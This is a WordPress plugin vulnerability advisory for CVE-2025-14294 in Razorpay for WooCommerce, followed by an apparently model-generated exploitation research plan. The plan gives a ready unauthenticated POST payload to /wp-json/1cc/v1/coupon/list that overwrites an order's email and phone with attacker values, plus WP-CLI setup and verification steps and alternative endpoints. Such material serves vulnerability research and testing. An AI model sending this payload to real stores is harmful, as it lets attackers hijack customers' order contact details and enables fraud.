# CVE-2025-14294: Razorpay for WooCommerce <= 4.7.8 - Missing Authentication to Unauthenticated Order Modification

The Razorpay for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the getCouponList() function in all versions up to, and including, 4.7.8. This is due to the checkAuthCredentials() permission callback always returning true, providing no actual authentication. This makes it possible for unauthenticated attackers to modify the billing and shipping contact information (email and phone) of any WooCommerce order by knowing or guessing the order ID.

## Advisory details

- **CVE:** CVE-2025-14294
- **Plugin slug:** woo-razorpay
- **Affected versions:** <= 4.7.8
- **Patched in version:** 4.7.9
- **Severity:** medium (CVSS 5.3, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`)
- **Vulnerability type:** Missing Authentication for Critical Function
- **Published:** 2026-02-18
- **Updated:** 2026-02-19 04:36:07
- **Days to patch:** 1
- **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/163d42df-148f-431c-891e-dbdc09bf2ae1?source=api-prod
- **Files changed by the patch:**
    - `includes/api/api.php`
    - `includes/api/auth.php`
    - `includes/api/cart.php`
    - `includes/api/coupon-apply.php`
    - `includes/api/coupon-get.php`
    - `includes/razorpay-webhook.php`
    - `readme.txt`
- **Research status:** researched (3 rounds completed, model `gemini-3-flash-preview`, started 2026-04-19 04:51:54, completed 2026-04-19 04:52:21); research verified: no
- **PoC status:** none recorded

## Source links

- Vulnerable version (4.7.8): https://plugins.trac.wordpress.org/browser/woo-razorpay/tags/4.7.8 (zip: https://downloads.wordpress.org/plugin/woo-razorpay.4.7.8.zip)
- Fixed version (4.7.9): https://plugins.trac.wordpress.org/browser/woo-razorpay/tags/4.7.9 (zip: https://downloads.wordpress.org/plugin/woo-razorpay.4.7.9.zip)
- All tags: https://plugins.trac.wordpress.org/browser/woo-razorpay/tags

# Exploitation Research Plan: CVE-2025-14294

## 1. Vulnerability Summary
The **Razorpay for WooCommerce** plugin (up to version 4.7.8) contains a missing authentication vulnerability in its custom REST API implementation. The plugin registers several endpoints for its "Magic Checkout" (1cc) feature. One specific endpoint, `1cc/v1/coupon/list`, uses a permission callback that unconditionally returns `true`. This allows unauthenticated attackers to invoke the `getCouponList` function, which incorrectly performs data modification (updating order billing/shipping info) before returning the requested coupon data.

## 2. Attack Vector Analysis
- **Endpoint:** `POST /wp-json/1cc/v1/coupon/list`
- **Vulnerable Parameter(s):**
    - `order_id`: The WooCommerce Order ID to target.
    - `email`: The new email address to set on the order.
    - `contact`: The new phone number to set on the order.
- **Authentication Level:** Unauthenticated (Public).
- **Preconditions:**
    - The plugin "Razorpay for WooCommerce" must be active.
    - An existing WooCommerce order ID must be known or guessed (order IDs are typically sequential integers).

## 3. Code Flow
1.  **Route Registration:** In `includes/api/api.php`, the function `rzp1ccInitRestApi()` registers the route:
    ```php
    register_rest_route(
        RZP_1CC_ROUTES_BASE . '/coupon', // '1cc/v1/coupon'
        'list',
        array(
            'methods'             => 'POST',
            'callback'            => 'getCouponList',
            'permission_callback' => 'checkAuthCredentials',
        )
    );
    ```
2.  **Auth Bypass:** The `permission_callback` points to `checkAuthCredentials()` in `includes/api/auth.php`, which simply returns `true`:
    ```php
    function checkAuthCredentials() {
        return true;
    }
    ```
3.  **Data Modification Sink:** The callback `getCouponList` in `includes/api/coupon-get.php` processes the request:
    - It retrieves `order_id`, `email`, and `contact` from the request parameters.
    - It fetches the order using `wc_get_order($orderId)`.
    - If an `email` is provided, it updates `_billing_email` and `_shipping_email` using either `update_meta_data` (for High-Performance Order Storage/HPOS) or `update_post_meta`.
    - If a `contact` is provided, it updates `_billing_phone` and `_shipping_phone` similarly.
    - All of this occurs before any coupon logic or validation beyond checking if the order exists.

## 4. Nonce Acquisition Strategy
This specific vulnerability **does not require a WordPress nonce**.
- The REST API endpoint is registered with a `permission_callback` that returns `true`.
- Standard WordPress REST API nonce requirements (`_wpnonce` or `X-WP-Nonce`) are enforced only for authenticated sessions to prevent CSRF. For unauthenticated routes explicitly allowing public access, WordPress does not require a nonce.
- Inspection of `getCouponList` in `includes/api/coupon-get.php` confirms there are no manual nonce verification calls (e.g., `wp_verify_nonce`).

## 5. Exploitation Strategy
The goal is to modify the contact details of an existing order.

### Step-by-Step Plan:
1.  **Identify Target:** Determine a valid WooCommerce Order ID (e.g., `123`).
2.  **Craft Payload:** Create a JSON or URL-encoded payload containing the target `order_id` and the malicious `email`/`contact` values.
3.  **Execute Request:** Send a POST request to the REST endpoint.

### HTTP Request (using `http_request` tool):
- **Method:** `POST`
- **URL:** `http://<target-site>/wp-json/1cc/v1/coupon/list`
- **Headers:**
    - `Content-Type: application/x-www-form-urlencoded`
- **Body:** `order_id=123&email=attacker@evil.com&contact=9999999999`

## 6. Test Data Setup
To verify the exploit in the test environment:
1.  **Install WooCommerce:** Ensure WooCommerce is active.
2.  **Create a Product:** `wp post create --post_type=product --post_title="Test Product" --post_status=publish`
3.  **Create an Order:**
    - Use WP-CLI to create an order: `wp wc shop_order create --user=1 --customer_id=1 --billing='{"email":"original@example.com","phone":"1234567890"}'`
    - Note the returned ID (e.g., `123`).
4.  **Confirm Original State:** `wp post meta get 123 _billing_email`

## 7. Expected Results
- **Success Indicator:** The server returns a `200 OK` (or potentially a `400` if coupon logic fails later, but after the metadata update). The response body will likely be a JSON object containing coupon data or an empty list.
- **Data Change:** The `_billing_email`, `_shipping_email`, `_billing_phone`, and `_shipping_phone` meta values for the target order ID will be updated to the values provided in the exploit.

## 8. Verification Steps
After executing the HTTP request, run the following WP-CLI commands to confirm the injection:
1.  **Check Email:** `wp post meta get <ORDER_ID> _billing_email`
    - *Expected:* `attacker@evil.com`
2.  **Check Phone:** `wp post meta get <ORDER_ID> _billing_phone`
    - *Expected:* `9999999999`
3.  **Check Shipping Info:** `wp post meta get <ORDER_ID> _shipping_email`
    - *Expected:* `attacker@evil.com`

## 9. Alternative Approaches
If the `1cc/v1/coupon/list` endpoint fails for some reason (e.g., environment-specific constraints on the query), other endpoints in `api.php` also use `checkAuthCredentials` and might have similar logic:
- `1cc/v1/coupon/apply` (`applyCouponOnCart`): Uses `order_id` and `email` and calls `initCustomerSessionAndCart()`.
- `1cc/v1/cod/order/prepay` (`prepayCODOrder`): Processes order information.

However, `getCouponList` is the most direct path as the modification logic is explicitly present in the source for that function. Reachable via: `includes/api/coupon-get.php` lines 47-66.